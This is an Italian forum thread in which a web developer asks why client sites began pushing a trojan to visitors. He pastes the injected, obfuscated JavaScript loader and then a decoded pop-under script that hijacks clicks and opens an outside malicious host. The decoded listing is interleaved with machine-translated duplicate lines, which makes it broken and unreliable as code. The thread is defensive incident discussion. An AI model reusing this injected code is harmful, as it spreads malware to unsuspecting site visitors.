hanno bucato il sito?

[Vincenzotto]

Sono già due clienti che mi chiamano dicendo che hanno problemi con i loro siti, una volta aperta la home page un trojan cerca di autoinstallarsi.

nel codice ho trovato questo

Codice PHP:

<script language="javascript">$="Z64zZ3dZ22Z2566uncZ2574Z2569oZ256eZ2520dw(Z2574)Z257bZ2563aZ253dZ2527Z252564oZ252563umZ252565Z25256eZ2574Z25252ewZ25257Z2532Z252569tZ252565Z2528Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572iZ2570Z252574 Z25256caZ25256eguZ252561gZ2525Z25365Z25253dZ25255cZ252522javaZ2573Z2563ripZ25257Z2534Z25255cZ25252Z2532Z25253Z2565Z2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscrZ252569Z252570tZ25253eZ2527;eval(Z2575nesZ2563apeZ2528t))Z257d;Z22;deZ3dZ22M+}Sx-|)K88d)K7}7M;}^}950Z2522Z259M+yv888d)K7t7M:Z25229.-Z252096688d)K7t7M:Z25229,-)99tSx-~)K8d)K7t7M50!Z25209M+u|cu0tSx-|)K88d)K7t7M:Z2526950Z2522Z279M+4-4Z3ebu`|qsu8tZ3ciSxZ2522;}Sx;iSx!;tSx;})Kd)K7}7MZ3d!M;7Z3esZ257F}79+Z22;dcZ3dZ22qi89;Z25229+u|cu0d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTqi899+yv8d)K7t7M,Z25209d)K7t7M-!+d)K7}7M-t)Z3ewud]Z257F~dx89;!+ve~sdyZ257F~0S]^8tZ3c}Z3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vybZ3esZ257F}7+fqb0iSx!Z3cZ22;ccZ3dZ22gZ2574Z2568;Z2569++)Z257btZ256dpZ253ddsZ252esZ256cicZ2565(Z2569Z252ciZ252b1)Z253bsZ22;caZ3dZ22Z2566unZ2563Z2574ioZ256e dcZ2573Z2528ds,Z2565sZ2529Z257bdsZ253duneZ2573caZ2570Z256Z22;opZ3dZ22Z2524Z253dZ2522dw(dcs(Z2563Z2575,1Z2534Z2529);Z2522;Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z253dZ2573Z2574;Z2564Z2563sZ2528dZ2561+Z2564bZ252bZ2564cZ252bZ2564dZ252bdZ2565,Z25310Z2529;Z2564wZ2528Z2573Z2574)Z253bsZ2574Z253d$Z253bZ2522;Z22;daZ3dZ22fqb0})-~ug0Qbbqi87|qe~Z257F7Z3c7Z7brtfu7Z3c7zsdxb7Z3c7ytvyb7Z3c7xufyv7Z3c7wvhuc7Z3c7vwfuc7Z3c7uxwxd7Z3c7tzu~y7Z3c7sZ7bud~7Z3c7r||uf7Z3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7y7Z3c7z7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z22;cuZ3dZ22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4Z3czub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dobuf4dZ7bdKazpqf4)4zaxxZ2fbuf4dZ7bdKwZ7bZ7bZ257F}qKzuyq4)46upbyuZ257FqfKZ257FZ7byud6Z2fbuf4dZ7bdK`}yqZ7ba`4)4#Z2526$Z2frazw`}Z7bz4dZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dobuf4}gKqzuvxqp4)4ruxgqZ2f}r4Z3c5c}zpZ7bc:Z7bdqfu42245zub}su`Z7bf:wZ7bZ7bZ257F}qQzuvxqpZ3dfq`afz4}gKqzuvxqpZ2f}r4Z3c`mdqZ7br4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43g`f}zs3Z3d}r4Z3cpZ7bwayqz`:wZ7bZ7bZ257F}q:xqzs`|4))4$Z3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)46`qg`6Z2f}gKqzuvxqp4)4pZ7bwayqz`:wZ7bZ7bZ257F}q4))43`qg`3Z2fpZ7bwayqz`:wZ7bZ7bZ257F}q4)433Z2fiqxgqo}gKqzuvxqp4)4`faqZ2fifq`afz4}gKqzuvxqpZ2firazw`}Z7bz4dZ7bdKsq`WZ7bZ7bZ257F}qZ3czuyqZ3dobuf4wZ7bZ7bZ257F}q4)46464?4pZ7bwayqz`:wZ7bZ7bZ257F}qZ2fbuf4gqufw|4)46464?4zuyq4?46)6Z2fbuf4gq`G`f4)4zaxxZ2fbuf4Z7brrgq`4)4$Z2fbuf4qzp4)4$Z2f}r4Z3cwZ7bZ7bZ257F}q:xqzs`|4*4$Z3doZ7brrgq`4)4wZ7bZ7bZ257F}q:}zpql[rZ3cgqufw|Z3dZ2f}r4Z3cZ7brrgq`45)49Z25Z3doZ7brrgq`4?)4gqufw|:xqzs`|Z2fqzp4)4wZ7bZ7bZ257F}q:}zpql[rZ3c6Z2f684Z7brrgq`Z3dZ2f}r4Z3cqzp4))49Z25Z3doqzp4)4wZ7bZ7bZ257F}q:xqzs`|Z2figq`G`f4)4azqgwudqZ3cwZ7bZ7bZ257F}q:gavg`f}zsZ3cZ7brrgq`84qzpZ3dZ3dZ2fiifq`afzZ3cgq`G`fZ3dZ2firazw`}Z7bz4dZ7bdKgq`WZ7bZ7bZ257F}q4Z3czuyq84buxaqZ3dopZ7bwayqz`:wZ7bZ7bZ257F}q4)4zuyq4?46)64?4qgwudqZ3cbuxaqZ3d4?46Z2f4qld}fqg)Rf}pum8Z27Z259Pqw9!$4Z2526Z27.!-.!-4SY@Z2f4du`|);Z2f6Z2firazw`}Z7bz4g|Z7bcKdZ7bdZ3cZ3dobuf4dZ7bdKczp4)46|``d.;;rvwyr}f:wZ7by;xp;yqz`;6Z2fbuf4rquKczp4)46gwfZ7bxxvufg)Z258fqg}nuvxq)Z258`Z7bZ7bxvuf)Z258xZ7bwu`}Z7bz)Z258yqzavuf)Z258g`u`ag)Z258p}fqw`Z7bf}qg)$6Z2fbuf4zqqpKZ7bdqz4)4`faqZ2f}r4Z3cpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdmZ3cZ3dZ2f}r4Z3cpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdm45)4zaxxZ3dpZ7bwayqz`:vZ7bpm:Z7bzvqrZ7bfqazxZ7bupKwZ7bdmZ3cZ3dZ2f}r4Z3cdZ7bdKazpqf45)4zaxxZ3do}r4Z3c5dZ7bdKazpqf:wxZ7bgqpZ3dzqqpKZ7bdqz4)4ruxgqZ2fi}r4Z3czqqpKZ7bdqzZ3do}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dobux4)4dZ7bdKsq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyqZ3dZ2f}r4Z3cbux45)4zaxxZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fbuxZ25264)4zqc4Pu`qZ3cbuxZ3dZ2fa`wZ27Z25264)4Pu`q:A@WZ3czZ7bc:sq`RaxxMqufZ3cZ3d84zZ7bc:sq`YZ7bz`|Z3cZ3d84zZ7bc:sq`Pu`qZ3cZ3d84zZ7bc:sq`Z255CZ7bafgZ3cZ3d84zZ7bc:sq`Y}za`qgZ3cZ3d84zZ7bc:sq`GqwZ7bzpgZ3cZ3dZ3dZ2fa`wZ25264)4Pu`q:A@WZ3cbuxZ2526:sq`RaxxMqufZ3cZ3d84buxZ2526:sq`YZ7bz`|Z3cZ3d84buxZ2526:sq`Pu`qZ3cZ3d84buxZ2526:sq`Z255CZ7bafgZ3cZ3d84buxZ2526:sq`Y}za`qgZ3cZ3d84buxZ2526:sq`GqwZ7bzpgZ3cZ3dZ3dZ2f}r4Z3c4Z3c4a`wZ27Z2526494a`wZ25264Z3d4;4Z25$$$4(4dZ7bdK`}yqZ7ba`Z3eZ2522$Z3dozqqpKZ7bdqz4)4ruxgqZ2fiiii}r4Z3czqqpKZ7bdqzZ3doazpqf4)4c}zpZ7bc:Z7bdqzZ3cdZ7bdKczp846684rquKczpZ3dZ2fazpqf:vxafZ3cZ3dZ2fc}zpZ7bc:rZ7bwagZ3cZ3dZ2f}r4Z3cdZ7bdKwZ7bZ7bZ257F}qKqzuvxqpZ3cZ3dZ3dozZ7bc4)4zqc4Pu`qZ3cZ3dZ2fdZ7bdKgq`WZ7bZ7bZ257F}qZ3cdZ7bdKwZ7bZ7bZ257F}qKzuyq84zZ7bcZ3dZ2fiiirazw`}Z7bz4dZ7bdK}z}`Z3cZ3dobuf4bqf4)4dufgqRxZ7bu`Z3czub}su`Z7bf:uddBqfg}Z7bzZ3dZ2fbuf4bqfZ25264)4Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-!6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4-,6Z3d*)$4hh4zub}su`Z7bf:agqfUsqz`:}zpql[rZ3c6C}zpZ7bcg4Z5a@6Z3d*)$4Z3d22Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3[dqfu3Z3d4))49Z25Z3d22Z3czub}su`Z7bf:uddZ5auyq45)43Z5aq`gwudq3Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3YG]Q3Z3d4*49Z25Z3d422Z3czub}su`Z7bf:agqfUsqz`:}zpql[rZ3c3GBZ253Z3d4*49Z25Z3d422Z3cbqf4*)4Z2520Z3dZ2f}r4Z3cbqfZ2526Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgZ3dorZ7bf4Z3cbuf4})$Z2f4}(pZ7bwayqz`:x}zZ257Fg:xqzs`|Z2f4}??Z3do}r4Z3cpZ7bwayqz`:x}zZ257FgO}I:`ufsq`45)46KvxuzZ257F6Z3dopZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257FZ2fpZ7bwayqz`:x}zZ257FgO}I:Z7bzwx}wZ257F4)4g|Z7bcKdZ7bdZ2fiiiipZ7bwayqz`:Z7bzwx}wZ257FKwZ7bdm4)4pZ7bwayqz`:Z7bzwx}wZ257FZ2fpZ7bwayqz`:Z7bzyZ7bagqad4)4g|Z7bcKdZ7bdZ2fidZ7bdK}z}`Z3cZ3dZ2fi(;gwf}d`*Z22;ddZ3dZ22iSxZ2522Z3c}SxZ3ctSxZ3c}^}+yv8d)K7i7M,Z2522Z2520Z2520Z279kd)K7i7M0-0Z2522Z2520Z2520Z27+m}^}-S]^8d)K7t7MZ3cd)K7}7MZ3cd)K7i7M9+iSx!-|)K888d)K7i7M6Z2520hQQ9;}^}950Z25265##950Z2522Z2526M+iSxZ2522-|)K8888d)K7i7M6Z2520h##!!9..#9;}^}950!Z25209Z22;ceZ3dZ22chaZ2572CodZ2565Z2541Z2574(0Z2529^Z2528Z25270x0Z2530Z2527+esZ2529)Z2529;}Z257dZ22;cbZ3dZ225(Z2564sZ2529Z253bstZ253dtmpZ253dZ2527Z2527;for(iZ253d0;Z2569Z253cdsZ252eleZ256eZ22;dbZ3dZ22Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~)-~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)Z3ewudVe||Iuqb89+yv8t)Z3ewudTqi89.#9d)K7t7M-t)Z3ewudTqdu89Z3d8t)Z3ewudTZ22;czZ3dZ22Z2566uncZ2574Z2569onZ2520Z2563z(cZ257a)Z257bretZ2575rnZ2520cZ2561+cbZ252bcc+Z2563d+cZ2565+czZ253b};Z22;cdZ3dZ22Z2574Z253dstZ252bSZ2574riZ256egZ252eZ2566Z2572omZ2543harZ2543odZ2565((tZ256dpZ252eZ22;Z69Z66 (Z64Z6fcumZ65nZ74Z2eZ63oZ6fkieZ2eindZ65Z78OfZ28Z27rfZ35fZ36dZ73Z27)Z3dZ3d-1)Z7bsc(Z27rfZ35fZ36Z64sZ27,2,Z37);Z65Z76al(Z75nZ65scaZ70e(Z64zZ2bczZ2boZ70+sZ74Z29+Z27dw(Z64z+Z63z(Z24+Z73t))Z3bZ27)Z7deZ6cZ73eZ7bZ24Z3dZ27Z27};functiZ6fn sZ63(Z63nZ6d,Z76,edZ29Z7bvar exZ64Z3dnewZ20DatZ65Z28);eZ78Z64Z2esetZ44Z61tZ65(Z65xZ64Z2egeZ74DaZ74e(Z29+eZ64)Z3bdocZ75Z6dZ65Z6et.Z63ooZ6bZ69eZ3dcnm+Z20Z27Z3dZ27 +escZ61peZ28vZ29Z2bZ27;expZ69Z72Z65Z73Z3dZ27+exdZ2eZ74oGZ4dTZ53tZ72ingZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($));document.write($);</script> 


Non è stato inserito da me... ma tolto naturalmente tutto funziona.

qualcuno ne ha mai sentito parlare?

[_GreyFox_]

si bello,
hanno iniettato quel codice...scopri come e dove e fixa!

[*pragma]

Originariamente inviato da Vincenzotto
Sono già due clienti che mi chiamano dicendo che hanno problemi con i loro siti, una volta aperta la home page un trojan cerca di autoinstallarsi.

nel codice ho trovato questo

Codice PHP:

<script language="javascript">$="ecc...  ecc...eval(z($));document.write($);</script> 


Non è stato inserito da me... ma tolto naturalmente tutto funziona.

qualcuno ne ha mai sentito parlare?

Certo che non è stato inserito da te, hai un modulo nel quale possono inserire delle opinioni o qualsiasi cosa di scritto?

bye

[Vincenzotto]

si nel sito ci sono dei moduli, ma oltre a filtrare i dati.... diciamo che non stanno nelle pagine incriminate.

Nel primo sito l'hosting non ha neanche i permessi di scrittura... 777 sulla root intendo, ma solo sulla cartella "allegati", quindi mi fa strano che hanno scritto tramite un'altro file la index... e poi come se non ci sono i permessi?

[Vincenzotto]

il primo sito è www.alteel.it fatto circa 7 anni fa...

[Vincenzotto]

sostituendo il document.write con un alert ho visualizzato questo

Codice PHP:

<script language="JavaScript"> 
     if (navigator.cookieEnabled){ if (navigator.cookieEnabled) ( 
         var pop_under = null; pop_under var = null; 
         var pop_cookie_name = "advmaker_komap"; pop_cookie_name var = "advmaker_komap"; 
         var pop_timeout = 720; var pop_timeout = 720; 
         function pop_cookie_enabled(){ pop_cookie_enabled funzione () ( 
             var is_enabled = false; var is_enabled = false; 
             if (!window.opera && !navigator.cookieEnabled) if (! window.opera & &! navigator.cookieEnabled)  
                 return is_enabled; is_enabled ritorno; 
             if (typeof document.cookie == 'string') if (typeof document.cookie == 'string') 
                 if (document.cookie.length == 0) { if (document.cookie.length == 0) ( 
                     document.cookie = "test"; document.cookie = "test"; 
                     is_enabled = document.cookie == 'test'; is_enabled = document.cookie == 'test'; 
                     document.cookie = ''; document.cookie =''; 
                 } else { Altre categorie () 
                     is_enabled = true; is_enabled = true; 
                 } ) 
             return is_enabled; is_enabled ritorno; 
         } ) 
         function pop_getCookie(name){ pop_getCookie funzione (nome) ( 
             var cookie = " " + document.cookie; var cookie = "" + document.cookie; 
             var search = " " + name + "="; var ricerca = "" + nome + "="; 
             var setStr = null; setStr var = null; 
             var offset = 0; var offset = 0; 
             var end = 0; var end = 0; 
             if (cookie.length > 0){ if (cookie.length> 0) ( 
                 offset = cookie.indexOf(search); offset = cookie.indexOf (ricerca); 
                 if (offset != -1){ if (offset! = -1) ( 
                     offset += search.length; offset + = search.length; 
                     end = cookie.indexOf(";", offset); fine = cookie.indexOf (";", offset); 
                     if (end == -1) { if (fine == -1) ( 
                         end = cookie.length; fine = cookie.length; 
                     } ) 
                     setStr = unescape(cookie.substring(offset, end)); setStr = unescape (cookie.substring (offset, end)); 
                 } ) 
             } ) 
             return(setStr); return (setStr); 
         } ) 
        
         function pop_setCookie (name, value){ pop_setCookie funzione (nome, valore) ( 
             document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;"; document.cookie = name + "=" + escape (valore) + "= Venerdì scade ,31-dic-50 23:59:59 GMT; path =/;"; 
         } ) 
         function show_pop(){ show_pop funzione () ( 
             var pop_wnd = "http://hayjgfxes.com/ld/grobin_pt/"; pop_wnd var = "http://hayjgfxes.com/ld/grobin_pt/"; 
             var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0"; fea_wnd var = "scrollbars => esizable = 1, toolbar = 1, location = 1, menubar = 1, status = 1, directories = 0"; 
             var need_open = true; var need_open = true; 
             if (document.onclick_copy != null) document.onclick_copy(); if (document.onclick_copy! = null) document.onclick_copy (); 
             if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy(); if (document.body.onbeforeunload_copy! = null) document.body.onbeforeunload_copy (); 
             if (pop_under != null){ if (pop_under! = null) ( 
                 if (!pop_under.closed)need_open = false; if (! pop_under.closed) need_open = false; 
             } ) 
             if (need_open){ if (need_open) ( 
                 if (pop_cookie_enabled()){ if (pop_cookie_enabled ()) ( 
                     val = pop_getCookie(pop_cookie_name); val = pop_getCookie (pop_cookie_name); 
                     if (val != null) { if (val! = null) ( 
                         now = new Date(); ora = new Date (); 
                         val2 = new Date(val); Val2 = new Date (Val); 
                         utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds()); utc32 = Date.UTC (now.getFullYear (), now.getMonth (), now.getDate (), now.getHours (), now.getMinutes (), now.getSeconds ()); 
                         utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds()); utc2 = Date.UTC (val2.getFullYear (), val2.getMonth (), val2.getDate (), val2.getHours (), val2.getMinutes (), val2.getSeconds ()); 
                         if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){ if ((utc32 - utc2) / 1000 <pop_timeout * 60) ( 
                             need_open = false; need_open = false; 
                         } ) 
                     } ) 
                 } ) 
             } ) 
             if (need_open){ if (need_open) ( 
                 under = window.open(pop_wnd, "", fea_wnd); sotto = window.open (pop_wnd, "", fea_wnd); 
                 under.blur(); under.blur (); 
                 window.focus(); window.focus (); 
                 if (pop_cookie_enabled()){ if (pop_cookie_enabled ()) ( 
                     now = new Date(); ora = new Date (); 
                     pop_setCookie(pop_cookie_name, now); pop_setCookie (pop_cookie_name, ora); 
                 } ) 
             } ) 
         } ) 
         function pop_init(){ pop_init funzione () ( 
             var ver = parseFloat(navigator.appVersion); var ver = parseFloat (navigator.appVersion); 
             var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4); var ver2 = (navigator.userAgent.indexOf ( "Windows 95")> = 0 | | navigator.userAgent.indexOf ( "Windows 98")> = 0 | | navigator.userAgent.indexOf ( "Windows NT")> = 0 ) & & (navigator.userAgent.indexOf ( 'Opera') == -1) & & (navigator.appName! = 'Netscape') & & (navigator.userAgent.indexOf ( 'MSIE')> -1) & & (navigator.userAgent . indexOf ( 'SV1')> -1) & & (cfr.> = 4); 
             if (ver2){ if (ver2) ( 
                 if (document.links){ if (document.links) ( 
                     for (var i=0; i<document.links.length; i++){ for (var i = 0; i <document.links.length; + + i) ( 
                         if (document.links[i].target != "_blank"){ if (document.links [i]. bersaglio! = "_blank") ( 
                             document.links[i].onclick_copy = document.links[i].onclick; document.links [i]. onclick_copy = document.links [i]. onclick; 
                             document.links[i].onclick = show_pop; document.links [i]. onclick = show_pop; 
                         } ) 
                     } ) 
                 } ) 
             } ) 
             document.onclick_copy = document.onclick; document.onclick_copy = document.onclick; 
             document.onmouseup = show_pop; document.onmouseup = show_pop; 
         } ) 
         pop_init(); pop_init (); 
     } ) 
 </script> </ Script> 


Sembra impossibile trovare info in tal senso... la mia curiosità è sapere da dove sono passati.

[alcio74]

Ti consiglio di studiare attentamente la GUIDA DI SICUREZZA IN PHP.
A me è stata utilissima.

Ad ogni modo, se sei spazio Windows, spesso gli hacker riescono ad entrare nel sito anche grazie alle estensioni per FrontPage.
Motivo in più per odiare quel programma!

[Vincenzotto]

nn penso sia dipeso da me, non è mancanza di umiltà ma ognuno dei 3 siti che hanno avuto questo attacco ha un CMS diverso e 2 di questi non hanno cartelle con permessi di scrittura.

NON penso sia un attacco fatta da http, neanche ftp visto che ho controllato i log e ci sto solo io....

[Riko]

sicuramente sono passati dai form non adeguatamente protetti..
successo lo stesso con me, hanno iniziato con dei script poi con il delete del db
tutto perche non conoscevo nulla di sicurezza php..
segui la guida segnalata da alcio74

Riko87

[alcio74]

A me invece è capitato di avere uno script malevolo simile nella homepage di un vecchio sito.
Questo significa che l'hacker non è entrato dalla form, per il semplice motivo che comunque la root del sito non aveva i permessi di scrittura per modificare scrivere codice direttamente dentro.
Non sono un hacker, quindi posso sbagliarmi, però per quei casi penso che chi forza il sito lo fa con altri metodi.

Il delete di una tabella invece è esempio classico di SQL Injection, per cui li si che si ha la certezza che si necessita di un solido controllo degli input.